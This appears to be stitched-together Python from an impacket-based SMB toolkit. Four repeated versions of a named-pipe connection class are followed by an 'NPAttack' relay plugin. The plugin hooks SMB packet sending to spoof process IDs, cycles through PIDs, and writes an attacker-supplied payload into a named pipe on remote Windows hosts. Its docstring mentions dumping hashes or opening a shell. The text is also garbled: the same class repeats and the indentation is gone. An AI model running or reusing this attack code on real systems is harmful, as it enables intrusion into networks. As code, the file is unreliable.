class Pipes(Thread):
def __init__(self, transport, pipe, permissions, TGS=None, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.TGS = TGS
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
global dialect
self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
self.server.setTimeout(1000000)
except:
print "[!] Something wen't wrong connecting the pipes(%s), try again" % self.__class__
class Pipes(Thread):
def __init__(self, transport, pipe, permissions, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
global dialect
#self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
else:
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
self.server.setTimeout(1000000)
except:
logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__)
class Pipes(Thread):
def __init__(self, transport, pipe, permissions, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
global dialect
#self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
self.server = SMBConnection(self.transport.get_smb_connection().getRemoteName(), self.transport.get_smb_connection().getRemoteHost(),
sess_port=self.port, preferredDialect=dialect)
user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
if self.transport.get_kerberos() is True:
self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)
else:
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
self.server.setTimeout(1000000)
except:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__)
class Pipes(Thread):
def __init__(self, transport, pipe, permissions, share=None):
Thread.__init__(self)
self.server = 0
self.transport = transport
self.credentials = transport.get_credentials()
self.tid = 0
self.fid = 0
self.share = share
self.port = transport.get_dport()
self.pipe = pipe
self.permissions = permissions
self.daemon = True
def connectPipe(self):
try:
lock.acquire()
self.server = SMBConnection(
'*SMBSERVER',
self.transport.get_smb_connection().getRemoteHost(),
sess_port=self.port)
user, passwd, domain, lm, nt, _, _, _ = self.credentials
self.server.login(user, passwd, domain, lm, nt)
lock.release()
self.tid = self.server.connectTree('IPC$')
self.server.waitNamedPipe(self.tid, self.pipe)
self.fid = self.server.openFile(self.tid,
self.pipe,
self.permissions,
creationOption=0x40,
fileAttributes=0x80)
self.server.setTimeout(1000000)
except Exception as e:
# traceback.print_exc()
logger.error('Named pipe connection error: %s (%s)' %
(str(e), self.__class__))
class NPAttack(ProtocolAttack):
"""
This is the SMB default attack class.
It will either dump the hashes from the remote target, or open an interactive
shell if the -i option is specified.
"""
PLUGIN_NAMES = ["NP"]
def __init__(self, config, SMBClient, username):
ProtocolAttack.__init__(self, config, SMBClient, username)
self.pid = int(config.pipe_client_pid)
self.pipe_name = config.pipe_name
self.payload = config.payload_path
if not config.command:
self.command = 'c:\\windows\\system32\\cmd.exe'
else:
self.command = config.command
self.sendSMB_Original = self.client._SMBConnection.sendSMB
self.client._SMBConnection.sendSMB = types.MethodType(
self.sendSMB, self.client._SMBConnection)
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
def openPipe(self, tid, pipe, accessMask):
pipeReady = False
tries = 50
while pipeReady is False and tries > 0:
try:
self.__SMBConnection.waitNamedPipe(tid, pipe)
pipeReady = True
except Exception as e:
print(str(e))
tries -= 1
time.sleep(2)
pass
if tries == 0:
raise Exception('Pipe not ready, aborting')
fid = self.__SMBConnection.openFile(tid,
pipe,
accessMask,
creationOption=0x40,
fileAttributes=0x80)
return fid
def isPipeAvailable(self, tid):
try:
fid = self.openPipe(tid, '\\' + self.pipe_name, 0x12019f)
self.__SMBConnection.closeFile(tid, fid)
return True
except:
return False
def sendPayload(self, tid):
result = True
fid = self.openPipe(tid, '\\' + self.pipe_name, 0x12019f)
payload_file = open(self.payload, mode='rb')
payload = payload_file.read()
response = None
try:
self.__SMBConnection.writeNamedPipe(tid, fid, payload, True)
response = self.__SMBConnection.readNamedPipe(tid, fid)
except Exception as e:
response = e
result = False
finally:
self.__SMBConnection.closeFile(tid, fid)
return result
def getData(self, original):
original['Pid'] = self.pid
return original.orignalGetData()
def sendSMB(self, original, packet):
# Some ugly hacks here, essentially we are hooking
# some original SMB1/2 function from impacket so we
# can intercept the calls and patch the PID at the correct point
if packet['Command'] is SMB2_CREATE: #SMB2/3
# If the command type is create for opening files/named pipes
# then replace the Reserved (PID) field with our spoofed PID
packet["Reserved"] = self.pid
elif packet['Command'] is SMB.SMB_COM_NT_CREATE_ANDX: #SMB1
# Additional level of hooks here since SMB1 packets are
# handled differently, and in fact the impacket does use
# the real process PID of the client, so we need to override
# that behavior
packet.orignalGetData = packet.getData
packet.getData = types.MethodType(self.getData, packet)
# Send our packet using original sendSMB function
self.sendSMB_Original(packet)
def run(self):
tid = self.__SMBConnection.connectTree('IPC$')
if not self.isPipeAvailable(tid):
LOG.warn("Pipe not found or accessible on host %s" %
(self.__SMBConnection.getRemoteHost()))
return
if self.pid is 0:
LOG.info(
"Pipe found and writable on %s, starting attack through PID cycling!"
% (self.__SMBConnection.getRemoteHost()))
self.pid = 4
while self.pid < 50000 and self.sendPayload(tid) is False:
self.pid += 4
LOG.info("Finished PID cycling on host %s",
self.__SMBConnection.getRemoteHost())
else:
LOG.info(
"Pipe found and writable on %s, sending payload using PID %d!"
% (self.__SMBConnection.getRemoteHost(), self.pid))
self.sendPayload(tid)
self.__SMBConnection.close()
